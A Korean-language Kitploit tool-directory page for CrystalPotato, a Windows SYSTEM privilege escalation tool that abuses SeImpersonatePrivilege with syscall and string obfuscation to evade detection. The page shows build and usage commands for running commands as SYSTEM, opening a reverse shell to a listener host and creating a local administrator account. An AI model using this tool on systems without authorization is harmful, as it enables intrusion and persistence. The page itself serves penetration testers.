Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CrystalPotato — 간접 시스템 콜, 동적 API 해석, 컴파일 타임 문자열 난독화를 통해 SeImpersonatePrivilege를 악용하는 GodPotato의 Crystal 포팅 버전입니다. 명령 실행, 리버스 셸 또는 사용자 추가를 지원합니다. | Kitploit
도구/GitHubGitHub/ricardojoserf/crystalpotato
Privilege EscalationExploitationPost-ExploitationPenetration TestingRed TeamingAdversarial Attack
GitHubricardojoserf/crystalpotato

CrystalPotato

간접 시스템 콜, 동적 API 해석, 컴파일 타임 문자열 난독화를 통해 SeImpersonatePrivilege를 악용하는 GodPotato의 Crystal 포팅 버전입니다. 명령 실행, 리버스 셸 또는 사용자 추가를 지원합니다.

저장소 보기
81일 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
웹사이트

CrystalPotato

GodPotato의 Crystal 포트로, SeImpersonatePrivilege 권한이 있는 계정에서 SYSTEM으로의 로컬 권한 상승 도구입니다. DCOM OXID Resolver와 named pipe 가장을 악용하여 동작합니다.

Windows API는 동적으로 확인되며 간접 syscall 스텁을 통해 호출됩니다. 모든 문자열은 컴파일 시 XOR로 난독화되며 기본적으로 명령 출력만 표시됩니다. Windows 10, 11 및 Server 2025에서 테스트되었습니다.

CrystalPotato

빌드

CrystalPotato는 Windows용 Crystal을 사용하여 종속성 없이 단일 파일로 컴파일됩니다:

root@kitploit:~
crystal build CrystalPotato.cr -o CrystalPotato.exe --release --static

사용법

명령 실행, 리버스 셸 시작, 또는 로컬 관리자 계정 생성을 수행합니다.

root@kitploit:~
CrystalPotato.exe -c <COMMAND>
CrystalPotato.exe -H <LHOST> -P <LPORT> [-c <SHELL>]
CrystalPotato.exe -u <USER> -pw <PASS>
플래그설명
-c CMDSYSTEM으로 실행할 명령 또는 리버스 셸용 셸 (기본값: cmd.exe)
-H HOST리버스 셸 리스너 호스트
-P PORT리버스 셸 리스너 포트
-u USER로컬 관리자 생성 - 사용자 이름
-pw PASS로컬 관리자 생성 - 비밀번호
-p NAME사용자 지정 파이프 이름 (기본값: Crystal)
-d디버그 출력
-dd전체 추적
-h도움말 표시

img2

출처

  • GodPotato - BeichenDream의 원본 C# 구현.

  • RustPotato - safedv의 Rust 구현.

  • SigmaPotato - 추가 기능이 포함된 tylerdotrar의 C# 구현.

도구 다운로드